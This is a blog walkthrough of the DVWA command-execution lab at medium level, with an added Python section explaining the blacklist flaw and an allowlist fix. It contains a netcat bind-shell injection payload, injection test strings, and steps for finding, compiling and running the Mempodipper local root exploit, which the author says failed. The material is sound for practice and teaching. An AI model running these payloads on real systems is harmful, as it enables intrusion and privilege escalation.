Monday, 05 March 2012

DVWA - Command Execution : MEDIUM LEVEL
TO GET THE ROOT




We start by opening DVWA.
Before that, start Apache and MySQL first; after that, it will appear as below.
You can fill in the username "admin" and the password "password".

Here we first set DVWA to the MEDIUM level.
Then click Command Execution, and here you can fill in | nc -l -p 1234 -e /bin/bash
This runs nc in listening mode.
After that, we open a console and type nc 127.0.0.1 1234
After you type ls, the output will appear as below.
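
Why the leading | in the input above still reaches the shell, and what the fix looks like, as an added example that is not part of the original post or of DVWA's own code. It assumes the MEDIUM level only deletes "&&" and ";" from the input; the ping command line, the function names and the sample inputs are constructed for illustration, and nothing here is executed.

```python
import ipaddress
import re

# Assumption: models a blacklist that deletes only "&&" and ";" from the input.
BLACKLIST = ("&&", ";")
# Characters a shell treats as operators, substitutions or redirections.
SHELL_META = re.compile(r"[|&;`$<>()\n\\]")

def blacklist_filter(target):
    """Weak form: delete known-bad tokens and keep everything else."""
    for token in BLACKLIST:
        target = target.replace(token, "")
    return target

def weak_command(target):
    """String the weak form would hand to a shell (built here, never run)."""
    return "ping -c 3 " + blacklist_filter(target)

def reaches_shell_operator(target):
    """True if a shell metacharacter survives the blacklist."""
    return bool(SHELL_META.search(blacklist_filter(target)))

def hardened_argv(target):
    """Hardened form: accept only a literal IP address and return an argv
    list meant for subprocess.run(argv) without shell=True, so no shell
    ever parses the user's input."""
    addr = ipaddress.ip_address(target.strip())  # ValueError if not an IP
    return ["ping", "-c", "3", str(addr)]

# Constructed sample inputs; "id" stands in for any second command.
SAMPLES = ["127.0.0.1", "127.0.0.1; id", "127.0.0.1 && id",
           "| id", "127.0.0.1 | id"]

def audit(samples):
    """Return (input, weak command, operator survives?, hardened accepts?)."""
    rows = []
    for s in samples:
        try:
            hardened_argv(s)
            accepted = True
        except ValueError:
            accepted = False
        rows.append((s, weak_command(s), reaches_shell_operator(s), accepted))
    return rows

if __name__ == "__main__":
    for s, cmd, leaks, ok in audit(SAMPLES):
        print(f"{s!r:20} weak={cmd!r:30} operator_survives={leaks} "
              f"hardened_accepts={ok}")
```

The blacklist neutralises the two separators it knows about and passes the pipe through unchanged, while the allowlist rejects every input that is not a plain IP address.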
Then we will start preparing the payload to be able to get root access on Backtrack.
Because the Backtrack kernel is version 2.6.39,
we first go to exploitdb and update it.
After the update, we search with the keyword ./searchsploit 2.6.39

or you can follow the instructions below. 

root@bt:/pentest/exploits/exploitdb# ./searchsploit 2.6.39
Description Path
---------------------------------------------------------------------------
Mempodipper - Linux Local Root for >=2.6.39 /linux/local/18411.c
root@bt:/pentest/exploits/exploitdb# cd platforms/linux/local/
root@bt:/pentest/exploits/exploitdb/platforms/linux/local# ls
root@bt:/pentest/exploits/exploitdb/platforms/linux/local# kwrite 18411.c 
To compile the file 18411.c, you can type the command below.
root@bt:/var# gcc -w exploit.c -o exploit 
Once that is in place, you can compile the file to /var/tmp.
To make sure it is in /var/tmp, you can follow the instructions below.
root@bt:/var# cd
root@bt:~# cd /tmp/
root@bt:/tmp# ls
exploit kde-root ksocket-root plugtmp serverauth.1iXwNGUfwV VMwareDnD
Back in the nc session we started earlier, we first go to /var/tmp
with the command cd /var/tmp
and then you can simply type ./exploit to run the payload.
The result will be like this ....

Above, we can see that it has not been fully successful,
because I am also still confused about why it does not get root ......
